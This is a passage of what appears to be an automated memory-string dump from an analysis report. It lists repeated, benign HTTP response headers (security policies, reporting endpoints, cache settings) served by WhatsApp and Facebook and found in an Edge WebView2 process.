nosniffX-XSS-Protection: 0X-Frame-Options: DENYorigin-agent-cluster: ?0Content-Type: text/html; charset="utf-8"X-FB-Debug: Mb2IN1fc/+B6XPejVaLoN5yA/p166PZx0SC3zZZNfL6cKIcwgxG54fyRps1JlebMO3GCI6J9CALBkPd8QttIaA==Date: Sun, 10 Mar 2024 16:46:06 GMTX-FB-Connection-Quality: MODERATE; q=0.3, rtt=198, rtx=0, c=14, mss=1274, tbw=3337,
                  Source: msedgewebview2.exe, 0000001D.00000003.2379485108.00002DDC011B0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367320467.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367024620.00002DDC01138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200 OKVary: Accept-Encodingreporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.twitter.com *.facebook.com *.facebook.net 'unsafe-inline' 'unsafe-eval';style-src 'self' data: blob: *.whatsapp.com *.whatsapp.net 'unsafe-inline' *.facebook.com;connect-src 'self' data: blob: *.whatsapp.com *.whatsapp.net wss://*.facebook.com:* *.fbcdn.net;font-src data: *.whatsapp.com *.whatsapp.net *.facebook.com static.xx.fbcdn.net https://fonts.gstatic.com;img-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.facebook.com *.fbcdn.net static.xx.fbcdn.net *.ytimg.com *.twitter.com;media-src 'self' data: blob: *.fbcdn.net;frame-src 'self' data: blob: *.twitter.com *.facebook.com *.youtube-nocookie.com *.youtube.com *.whatsapp.com;block-all-mixed-content;upgrade-insecure-requests;permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy: same-origincross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"Pragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYorigin-agent-cluster: ?0Content-Type: text/html; charset="utf-8"X-FB-Debug: Mb2IN1fc/+B6XPejVaLoN5yA/p166PZx0SC3zZZNfL6cKIcwgxG54fyRps1JlebMO3GCI6J9CALBkPd8QttIaA==Date: Sun, 10 Mar 2024 16:46:06 GMTX-FB-Connection-Quality: MODERATE; q=0.3, rtt=198, rtx=0, c=14, mss=1274, tbw=3337,
                  Source: msedgewebview2.exe, 00000020.00000003.2550584728.00001B440066C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 20:29:16 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*
                  Source: msedgewebview2.exe, 00000020.00000003.2550584728.00001B440066C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 20:29:16 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*
                  Source: msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 20:29:16 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*
                  Source: msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 20:29:16 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*
                  Source: msedgewebview2.exe, 00000020.00000003.2545451904.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 17:54:02 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2545451904.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 17:54:02 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 21:07:23 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 21:07:23 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 23:36:04 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql 